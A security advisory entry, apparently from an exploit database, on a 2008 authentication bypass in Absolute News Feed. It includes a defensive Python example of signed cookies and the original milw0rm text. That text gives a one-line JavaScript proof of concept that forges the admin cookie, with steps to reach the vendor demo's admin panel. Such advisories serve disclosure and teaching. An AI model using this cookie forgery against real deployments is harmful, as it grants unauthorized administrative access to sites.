Vendor: Absolute News Feed
By: Hakxer
CVSS: 3.3 (LOW)
Vulnerability: Insecure Cookie Vulnerability
CWE: 264
Product Name: Absolute News Feed
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Absolute News Feed Insecure Cookie Vulnerability

A vulnerability in Absolute News Feed allows an attacker to gain administrative access by setting a cookie. The application accepts the client-supplied cookie as proof of an administrative session: an attacker can set the cookie xlaAFSuser to the value p=admin (sent as 'xlaAFSuser=p=admin') and then access the administrative panel at http://www.xigla.com/absolutenf/demo/menu.aspx.

Mitigation:

Ensure that cookies are properly validated and that only valid values are accepted.
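
The following is an added example, not code from Absolute News Feed or from the original advisory. It contrasts the cookie check the advisory implies with an HMAC-signed, expiring cookie that the server verifies before granting access. SERVER_KEY, the function names and the exp/sig fields are assumptions made for illustration; only the cookie name and the p=admin value come from the advisory.

```python
import hashlib
import hmac
import secrets
import time

COOKIE_NAME = "xlaAFSuser"             # cookie name taken from the advisory
SERVER_KEY = secrets.token_bytes(32)   # assumption: per-deployment secret kept server-side


def parse_cookies(header):
    """Split a Cookie request header into {name: value}; values may contain '='."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar


def is_admin_vulnerable(header):
    """Flawed pattern from the advisory: the role comes straight from the client."""
    return parse_cookies(header).get(COOKIE_NAME) == "p=admin"


def _mac(payload, key):
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user, now=None, ttl=900, key=SERVER_KEY):
    """Call only after a successful login; assumes user contains no '&' or '='."""
    expires = int(time.time() if now is None else now) + ttl
    payload = f"p={user}&exp={expires}"
    return f"{COOKIE_NAME}={payload}&sig={_mac(payload, key)}"


def authenticated_user(header, now=None, key=SERVER_KEY):
    """Hardened check: return the user name, or None if forged, altered or expired."""
    value = parse_cookies(header).get(COOKIE_NAME, "")
    payload, sep, sig = value.rpartition("&sig=")
    if not sep or not hmac.compare_digest(_mac(payload, key).encode(), sig.encode()):
        return None
    # The MAC verified, so the payload is exactly what issue_cookie() produced.
    fields = dict(f.partition("=")[::2] for f in payload.split("&"))
    if int(fields["exp"]) <= (time.time() if now is None else now):
        return None
    return fields["p"]
```

A random session identifier looked up in a server-side session store gives the same guarantee without placing the user name in the cookie at all.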

Exploit-DB raw data:

########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# milw0rm.com [2008-10-31]